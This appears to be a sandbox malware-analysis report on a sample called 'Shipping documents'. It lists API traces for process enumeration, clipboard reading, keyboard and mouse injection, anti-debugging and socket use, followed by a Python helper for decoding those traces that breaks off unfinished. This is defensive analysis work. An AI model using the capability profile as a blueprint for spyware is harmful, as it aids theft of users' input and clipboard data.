                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                          • API String ID: 0-2872873767
                                                                                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                          • __wsplitpath.LIBCMT ref: 00475644
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcscat.LIBCMT ref: 00475657
                                                                                                          • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2547909840-0
                                                                                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                          • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                          • String ID: *.*$\VH
                                                                                                          • API String ID: 2786137511-2657498754
                                                                                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID: pqI
                                                                                                          • API String ID: 2579439406-2459173057
                                                                                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                          APIs
                                                                                                          • __wcsicoll.LIBCMT ref: 00433349
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                          • __wcsicoll.LIBCMT ref: 00433375
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicollmouse_event
                                                                                                          • String ID: DOWN
                                                                                                          • API String ID: 1033544147-711622031
                                                                                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3031425849-0
                                                                                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                          APIs
                                                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 4170576061-0
                                                                                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                          APIs
                                                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                          • IsWindowVisible.USER32 ref: 0047A368
                                                                                                          • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                          • IsIconic.USER32 ref: 0047A393
                                                                                                          • IsZoomed.USER32 ref: 0047A3A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                          APIs
                                                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                          • CoUninitialize.OLE32 ref: 0047863C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 886957087-24824748
                                                                                                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15083398-0
                                                                                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: U$\
                                                                                                          • API String ID: 4104443479-100911408
                                                                                                          • Opcode ID: 55a527c89cce6aac9f503012c1253d9ae05f00ef26dfca22b5e57f48bb3c404e
                                                                                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                          • Opcode Fuzzy Hash: 55a527c89cce6aac9f503012c1253d9ae05f00ef26dfca22b5e57f48bb3c404e
                                                                                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 3541575487-0
                                                                                                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 48322524-0
                                                                                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
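The function entries above record each API call with raw hexadecimal arguments, so an analyst triaging the report has to decode the constants by hand (the socket call's 00000002,00000002,00000011 is AF_INET, SOCK_DGRAM, IPPROTO_UDP; the clipboard format 0000000D is CF_UNICODETEXT and 00000001 is CF_TEXT). The following Python is an added analyst helper, not part of the Joe Sandbox report or its IDA plugin: it parses the "APIs" bullets of these entries (sample input copied from this page, with one "Part of subcall function" line included to show it is skipped because that call belongs to a callee) and turns them into capability tags. The tag wording and the matching rules are this example's own assumptions, not Joe Sandbox signatures.

```python
"""Added example: decode Joe Sandbox 'APIs' trace bullets into capability tags.
Not part of the report. Sample input below is copied from the function entries
on this page; rule set and tag wording are this example's own choices."""
import re

# Constructed input: 'APIs' sections of several function entries above.
TRACE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
APIs
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
"""

# One bullet: "• Api.MODULE(arg,arg,...), ref: 0047666F"; the argument list is optional.
CALL_RE = re.compile(
    r"•\s+(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})"
)

# Win32 constants as they appear in the traces (32-bit hex). Values are from the Windows SDK.
ADDRESS_FAMILIES = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTOCOLS = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}


def arg_int(arg):
    """Hex argument to int; '?' (value unknown to the sandbox) becomes None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_entries(text):
    """Split the trace at each 'APIs' header and parse its bullets into
    (api, module, args, ref) tuples. Subcall bullets are skipped: they are
    calls made by a callee, not by the function the entry describes."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            entries.append(current)
            continue
        if current is None or not line.startswith("•") or "Part of subcall" in line:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.append((m.group("api"), m.group("mod"), args, m.group("ref")))
    return entries


def describe_socket(args):
    """Decode socket(af, type, protocol); unknown values are left as the raw hex."""
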